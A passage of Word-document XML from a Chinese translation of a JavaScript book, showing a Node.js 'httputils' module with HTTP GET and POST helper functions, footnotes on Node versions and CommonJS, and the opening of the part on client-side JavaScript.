        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write(content);//</w:t>
      </w:r>
      <w:r>
        <w:t>把文件内容作为响应主体发送</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();//</w:t>
      </w:r>
      <w:r>
        <w:t>完成</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299" w:name="12_2_2_NodeShi_Li__HTTPKe_Hu_Duan_Gong_J"/>
      <w:r>
        <w:t>12.2.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>示例：</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>客户端工具模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>12-3</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"http"</w:t>
      </w:r>
      <w:r>
        <w:t>模块定义了用于发送</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求的工具函数。本例则是基于</w:t>
      </w:r>
      <w:r>
        <w:t>"httputils"</w:t>
      </w:r>
      <w:r>
        <w:t>模块，在代码中应该这样使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var httputils=require("./httputils");//</w:t>
      </w:r>
      <w:r>
        <w:t>注意没有</w:t>
      </w:r>
      <w:r>
        <w:t>".js"</w:t>
      </w:r>
      <w:r>
        <w:t>后缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>httputils.get(url,function(status,headers,body){console.log(body);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>require()</w:t>
      </w:r>
      <w:r>
        <w:t>函数并非用普通的</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来执行模块代码。模块是在一个特殊的环境中执行，以便它们不能定义任</w:t>
      </w:r>
      <w:r>
        <w:t>何全局变量或更改其他全局命名空间。这个特殊的模块执行环境总是包含一个叫</w:t>
      </w:r>
      <w:r>
        <w:t>exports</w:t>
      </w:r>
      <w:r>
        <w:t>的全局对象，模块通过在这个对象中定义属性来导出它们的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
      <w:r>
        <w:t>12-3</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Node"httputils"</w:t>
      </w:r>
      <w:r>
        <w:t>模块</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基于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>"httputils"</w:t>
      </w:r>
      <w:r>
        <w:t>模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为指定的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>实现一个异步</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并将</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>状态、头和响应主体传递给指定的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意这里是如何通过</w:t>
      </w:r>
      <w:r>
        <w:t>exports</w:t>
      </w:r>
      <w:r>
        <w:t>对象导出这个方法的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>exports.get=function(url,callback){//</w:t>
      </w:r>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，获取所需的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url=require('url').parse(url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hostname=url.hostname,port=url.port||80;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var path=url.pathname,query=url.query;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(query)path+="?"+query;//</w:t>
      </w:r>
      <w:r>
        <w:t>实现一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var client=require("http").createClient(port,hostn</w:t>
      </w:r>
      <w:r>
        <w:t>ame);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=client.request("GET",path,{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Host":hostname//Request headers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.end();//</w:t>
      </w:r>
      <w:r>
        <w:t>该函数用于处理到达的响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.on("response",function(response){//</w:t>
      </w:r>
      <w:r>
        <w:t>设置编码，使返回的主体成为文本而非字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.setEncoding("utf8");//</w:t>
      </w:r>
      <w:r>
        <w:t>一旦响应主体达到，保存它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var body=""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.on("data",function(chunk){body+=chunk;});//</w:t>
      </w:r>
      <w:r>
        <w:t>响应完成时，调用这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.on("end",function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(callback)callback(response.statusCode,response.headers,body);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>以数据作为请求主体的简单</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>exports.post=function(url,data,callback){//</w:t>
      </w:r>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，获取所需的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>=require('url').parse(url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var hostname=url.hostname,port=url.port||80;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var path=url.pathname,query=url.query;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(query)path+="?"+query;//</w:t>
      </w:r>
      <w:r>
        <w:t>判断将要作为请求主体发送的数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var type;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(data==null)data="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(data instanceof Buffer)//</w:t>
      </w:r>
      <w:r>
        <w:t>二进制数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type="application/octet-stream";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(typeof data==="string")//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>type="text/plain;charset=UTF-8";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(typeof data==="object"){//</w:t>
      </w:r>
      <w:r>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data=require("querystring").stringify(data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>type="application/x-www-form-urlencoded";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，其中包括请求主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var client=require("http").createCl</w:t>
      </w:r>
      <w:r>
        <w:t>ient(port,hostname);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var request=client.request("POST",path,{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Host":hostname,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"Content-Type":type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.write(data);//</w:t>
      </w:r>
      <w:r>
        <w:t>发送请求主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>request.on("response",function(response){//</w:t>
      </w:r>
      <w:r>
        <w:t>处理响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.setEncoding("utf8");//</w:t>
      </w:r>
      <w:r>
        <w:t>假设它是文本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var body=""//</w:t>
      </w:r>
      <w:r>
        <w:t>用于保存响应主体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.on("data",function(chunk){body+=chunk;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.on("end",function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>完成后，调用回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(callback)callback(response.statusCode,response.headers,body);</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4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>是其官方名字，</w:t>
      </w:r>
      <w:r>
        <w:t>Node.js</w:t>
      </w:r>
      <w:r>
        <w:t>是非官方名字，用于和其他的</w:t>
      </w:r>
      <w:r>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:t>区分，具体内容见</w:t>
      </w:r>
      <w:r>
        <w:t>https://www./github.com/joyent/node/wiki/FAQ</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>1.7r3</w:t>
      </w:r>
      <w:r>
        <w:t>版本已经在</w:t>
      </w:r>
      <w:r>
        <w:t>2011.06.03</w:t>
      </w:r>
      <w:r>
        <w:t>正式发布，具体内容见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.mozilla.org/rhino/download.html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>也能高度地异步和基于事件，如果你读过本书第二部分，且在客户端中运行过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序，就会很容易理解本章的例子。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>大家也可以查</w:t>
      </w:r>
      <w:r>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:t>CNode</w:t>
      </w:r>
      <w:r>
        <w:t>社区组织翻译的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>中文文档，参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://cnodejs.org/cman/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>在翻译本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>发布了</w:t>
      </w:r>
      <w:r>
        <w:t>0.4.12</w:t>
      </w:r>
      <w:r>
        <w:t>稳定版和</w:t>
      </w:r>
      <w:r>
        <w:t>0.5.7</w:t>
      </w:r>
      <w:r>
        <w:t>不稳定版。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的版本控制方案是偶数版本稳定，奇数版本不稳定，稳定版本只会修复</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，不会改变</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript API</w:t>
      </w:r>
      <w:r>
        <w:t>和扩展</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，在稳定版本分支升级之后不需要重新生成模块。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>shebang</w:t>
      </w:r>
      <w:r>
        <w:t>的详细解释请查看</w:t>
      </w:r>
      <w:r>
        <w:t>http://zh.wikipedia.org/wiki/Shebang</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>实现了</w:t>
      </w:r>
      <w:r>
        <w:t>CommonJS</w:t>
      </w:r>
      <w:r>
        <w:t>模块约定</w:t>
      </w:r>
      <w:r>
        <w:t>，具体内容请参见</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.commonjs.org/specs/modules/1.0/</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="300" w:name="Di_Er_Bu_Fen__Ke_Hu_Duan_JavaScript____B"/>
      <w:bookmarkStart w:id="301" w:name="Di_Er_Bu_Fen__Ke_Hu_Duan_JavaScript"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第二部分　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
      <w:bookmarkEnd w:id="301"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第二部分涵盖第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章，主要讲解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是如何在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中实现的。这些章节介绍了大量的脚本宿主对象，这些对象可以表示浏览器窗口、文档树和文档的内容等。这些章节同样涵盖重要的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用所需的网络编程</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>、本地存储和检索数据、画图等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚</w:t>
      </w:r>
      <w:r>
        <w:t>本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章　事件处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
